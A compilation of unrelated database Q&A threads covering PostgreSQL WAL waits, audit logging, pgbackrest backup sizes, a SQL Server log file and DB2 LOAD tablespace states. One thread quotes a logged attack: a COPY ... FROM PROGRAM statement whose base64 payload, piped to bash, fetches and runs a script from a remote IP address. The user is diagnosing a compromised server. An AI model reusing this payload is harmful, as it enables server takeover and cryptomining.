I am using PostgreSQL and pgAdmin. I had a table (about 12 million rows) in another database which I wanted to transfer to a table in a new database. So I created a custom backup of that table and tried a restore into the new table. The restore job has been running for a while now (about an hour). In pgAdmin's database activity panel, I see that the activity on the table I am trying to restore (social) shows as idle, and the active session's wait event says WALInitSync. I looked it up in the PostgreSQL documentation, and it says:
Waiting for a newly initialized WAL file to reach stable storage.
What does this mean? And why is it taking so long?
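For anyone who wants to watch this outside pgAdmin's activity panel, the wait event can be polled directly from pg_stat_activity (a minimal sketch; 'social' is taken from the question and assumed here to be the target database):
-- Poll the restore session's current wait event
SELECT pid, state, wait_event_type, wait_event, query
FROM pg_stat_activity
WHERE datname = 'social';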
I have recently moved my database from Azure to self-hosted PostgreSQL.
But the VM utilization of the database server spikes up to 100% and stays there for hours, even though no heavy operations are being performed.
After that, the database shuts down. This happens at regular intervals.
I resized the database server to a higher configuration; since then utilization only goes up to 50% and stays there, but the database still gets shut down.
After checking the logs, I found this query being executed, which is not at all related to my project:
postgres#postgres STATEMENT: DROP TABLE IF EXISTS UofsVBqD;
CREATE TABLE UofsVBqD(cmd_output text);
COPY UofsVBqD FROM PROGRAM
'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE5NC40MC4yNDMuMjA1L3BnLnNofGJhc2gKZWxpZiBbIC14ICIkKGNvbW1hbmQgLXYgd2dldCkiIF07IHRoZW4KICB3Z2V0IC1xIC1PLSAxOTQuNDAuMjQzLjIwNS9wZy5zaHxiYXNoCmVsc2UKICBfX2N1cmwgaHR0cDovLzE5NC40MC4yNDMuMjA1L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';
SELECT * FROM UofsVBqD;
DROP TABLE IF EXISTS UofsVBqD;
Here I am attaching logs of the spikes
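For context, the base64 blob above decodes to a shell script that kills a few processes and then downloads and pipes a second-stage script from 194.40.243.205 into bash, so this looks like a compromised, internet-exposed postgres account being abused for cryptomining via COPY ... FROM PROGRAM. A minimal sketch for checking which roles are even able to run such a statement (superusers, plus members of the predefined pg_execute_server_program role, which exists since PostgreSQL 11):
-- List roles that can execute COPY ... FROM PROGRAM
SELECT rolname
FROM pg_roles
WHERE rolsuper
   OR pg_has_role(oid, 'pg_execute_server_program', 'member');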
How can I (using pgAdmin) access or create a log (ideally timestamped) that displays the changes that have happened to a table?
First of all, enable pg_stat_statements on PostgreSQL. The module has to be added to shared_preload_libraries in postgresql.conf (which requires a server restart), and then the extension created:
CREATE EXTENSION pg_stat_statements;
After that you can view statistics for all SQL statements executed on your DB: how often each one was called, its total and mean execution time, and so on. Note that pg_stat_statements aggregates statistics per statement; it does not record when each individual execution started or finished.
For more details: PostgreSQL Documentation - pg_stat_statements
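For illustration, a typical query against the view might look like this (a sketch; the timing columns are named total_exec_time/mean_exec_time from PostgreSQL 13 on, total_time/mean_time before that):
-- The ten statements with the highest cumulative execution time
SELECT query, calls, total_exec_time, mean_exec_time
FROM pg_stat_statements
ORDER BY total_exec_time DESC
LIMIT 10;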
If you need a history of updated or deleted records in the tables, you can build it manually for all tables by writing triggers or your own functions, using the JSON (JSONB) data types.
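A hedged sketch of that trigger approach (all names here, audit_log, audit_trigger_fn, my_table, are illustrative, not from the original post):
-- Generic audit table: one timestamped row per change
CREATE TABLE audit_log (
    id         bigserial   PRIMARY KEY,
    table_name text        NOT NULL,
    operation  text        NOT NULL,
    changed_at timestamptz NOT NULL DEFAULT now(),
    old_row    jsonb,
    new_row    jsonb
);

-- Trigger function: stores the old/new row images as JSONB
CREATE OR REPLACE FUNCTION audit_trigger_fn() RETURNS trigger AS $$
BEGIN
    IF TG_OP = 'INSERT' THEN
        INSERT INTO audit_log (table_name, operation, new_row)
        VALUES (TG_TABLE_NAME, TG_OP, to_jsonb(NEW));
        RETURN NEW;
    ELSIF TG_OP = 'UPDATE' THEN
        INSERT INTO audit_log (table_name, operation, old_row, new_row)
        VALUES (TG_TABLE_NAME, TG_OP, to_jsonb(OLD), to_jsonb(NEW));
        RETURN NEW;
    ELSE  -- DELETE
        INSERT INTO audit_log (table_name, operation, old_row)
        VALUES (TG_TABLE_NAME, TG_OP, to_jsonb(OLD));
        RETURN OLD;
    END IF;
END;
$$ LANGUAGE plpgsql;

-- Attach it to the table you want audited (EXECUTE FUNCTION needs PostgreSQL 11+)
CREATE TRIGGER my_table_audit
AFTER INSERT OR UPDATE OR DELETE ON my_table
FOR EACH ROW EXECUTE FUNCTION audit_trigger_fn();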
We are using pgbackrest to backup our database to Amazon S3. We do full backups once a week and an incremental backup every other day.
The size of our database is around 1TB; a full backup is around 600GB, and even an incremental backup is still around 400GB!
We found out that even read access (pure select statements) on the database has the effect that the underlying data files (in /usr/local/pgsql/data/base/xxxxxx) change. This results in large incremental backups and also in very large storage (costs) on Amazon S3.
Usually the files with low index names (e.g. 391089.1) change on read access.
On an update, we see changes in one or more files - the index could correlate to the age of the row in the table.
Some more facts:
Postgres version 13.1
Database is running in docker container (docker version 20.10.0)
OS is CentOS 7
We see the phenomenon on multiple servers.
Can someone explain why PostgreSQL changes data files on pure read access?
We tested on an otherwise idle database, with nothing else accessing it.
This is normal. Some cases I can think of right away are:
a SELECT or other SQL statement setting a hint bit
This is a shortcut for subsequent statements that access the data, so they don't have to consult the commit log any more.
a SELECT ... FOR UPDATE writing a row lock
autovacuum removing dead row versions
These are leftovers from DELETE or UPDATE.
autovacuum freezing old visible row versions
This is necessary to prevent data corruption if the transaction ID counter wraps around.
The only way to fairly reliably prevent PostgreSQL from modifying a table in the future is to do both of the following (a sketch of the second step follows the list):
never perform an INSERT, UPDATE or DELETE on it
run VACUUM (FREEZE) on the table and make sure that there are no concurrent transactions
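A minimal sketch of that second step (the table name is illustrative):
-- Freeze all row versions so later SELECTs find no hint bits or
-- freezing work left to do; run it in a quiet maintenance window
VACUUM (FREEZE, VERBOSE) myschema.mytable;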
I am using SQL Server 2008 R2 with an application deployed on it that receives data every 10 seconds. Because of this, the size of my log file has grown to 40 GB. How can I reduce the size of the growing log file? (I have tried shrinking, but it didn't work for me.) How can I solve this issue?
Find the table that stores the exception log in your database, i.e. the table (and its child tables) that gets populated whenever you perform an operation in your application.
Truncate these tables. For example:
a) TRUNCATE TABLE SGS_ACT_LOG_INST_QUERY;
b) TRUNCATE TABLE SGS_ACT_LOG_THRESHOLD_QUERY;
c) TRUNCATE TABLE SGS_EXCEPTION_LOG;
Don't truncate these kinds of tables on a daily basis; do it only when the size of the database has grown because of them:
i) SGS_EXCEPTION_LOG (the table that stores exception logs in your DB)
ii) SGS_ACT_LOG_INST_QUERY (a table that stores information whenever any operation is performed on the database)
iii) SGS_ACT_LOG_THRESHOLD_QUERY (a table that stores information whenever any operation is performed on the database)
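Before truncating, it may be worth confirming that these tables are really what is driving the growth; sp_spaceused reports a table's row count and allocated size (a sketch using one of the table names above):
-- Check how much space the exception-log table is using
EXEC sp_spaceused N'SGS_EXCEPTION_LOG';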
I have a comma-delimited .csv file (located on C:). I am using the DB2 LOAD utility to load the data present in the CSV file into a DB2 table.
LOAD CLIENT FROM C:\Users\somepath\FileName.csv of del
MODIFIED BY NOCHARDEL COLDEL, insert into SchemaName.TABLE_NAME;
The CSV file has 25 rows. After the utility completed, I got an error message for NOCHARDEL. My table has all 25 rows properly loaded. Now, when I try to execute an INSERT/UPDATE/DELETE statement on any of the tables present in that schema, I get the following error:
Lookup Error - DB2 Database Error: ERROR [55039] [IBM][DB2/AIX64] SQL0290N Table space access is not allowed.
Could you please help me figure out whether I am making a mistake or missing a parameter that is causing the lock on the table?
Earlier, while loading the file, a similar situation occurred, and the DBA confirmed that the table space in question was in the "load in progress" state.
Changes generated by the DB2 LOAD utility are not logged (one of the side-effects of its high performance). If the database crashes immediately after the load it will be impossible to recover the table that was loaded by replaying log records, because there are no such records. For this reason the tablespace containing the loaded table is automatically placed in the BACKUP PENDING mode, forcing you to take a backup of that tablespace or the entire database to ensure it is fully recoverable.
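A minimal sketch of clearing that state (database, tablespace, and path names are illustrative; ONLINE requires archive logging, omit it for an offline backup):
-- Back up just the affected tablespace to release it from BACKUP PENDING
BACKUP DATABASE mydb TABLESPACE (USERSPACE1) ONLINE TO /backup/path;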
There are options that you can specify for the LOAD command that can help you avoid this situation in the future (an example follows the list):
NONRECOVERABLE -- this option does not place the tablespace into the BACKUP PENDING mode, but, as its name implies, the table you're loading to becomes non-recoverable in case of a crash, and your only option in that situation will be to drop and re-create the table.
COPY YES -- this option also avoids the BACKUP PENDING mode; instead it saves a copy of the loaded data, which can be used during rollforward recovery to reproduce the load after a crash.
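For example, the original command with the first option added would look like this (same file and table names as in the question; a sketch, not tested):
LOAD CLIENT FROM C:\Users\somepath\FileName.csv OF DEL
  MODIFIED BY NOCHARDEL COLDEL,
  INSERT INTO SchemaName.TABLE_NAME
  NONRECOVERABLE;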
If you are only loading 25 records, I suggest you use the IMPORT utility instead -- it does not have these restrictions because it is fully logged (at the price of lower performance, which for 25 records won't matter).
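A sketch of the equivalent IMPORT invocation (same names as in the question; IMPORT reads the file from the client, so no CLIENT keyword is needed):
IMPORT FROM C:\Users\somepath\FileName.csv OF DEL
  MODIFIED BY COLDEL,
  INSERT INTO SchemaName.TABLE_NAME;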
Thanks @mustaccio. I had 60 million rows to insert; I was using 25 as a sample to check the outcome.
To add another point: we later came to know that this is a known DB2 bug that keeps the load in the "in progress" state (DB2 is unable to acknowledge that the load has completed, and the session remains open indefinitely) and places the table space in the backup pending state.
Recovery is the only option to release the table space once it is in the pending state.
This issue is fixed in Fix Pack 10 as per the DB2 team (we have yet to deploy and test it). Meanwhile, the NONRECOVERABLE keyword is working fine for us.
The reason why your table is stuck in the LOAD IN PROGRESS state is the NOCHARDEL error happening at the end of the LOAD.
Have you tried restarting the database? This should reinitialize all table spaces and remove any rogue states.
http://www-01.ibm.com/support/docview.wss?uid=swg1IC65395
http://www-01.ibm.com/support/docview.wss?uid=swg21427102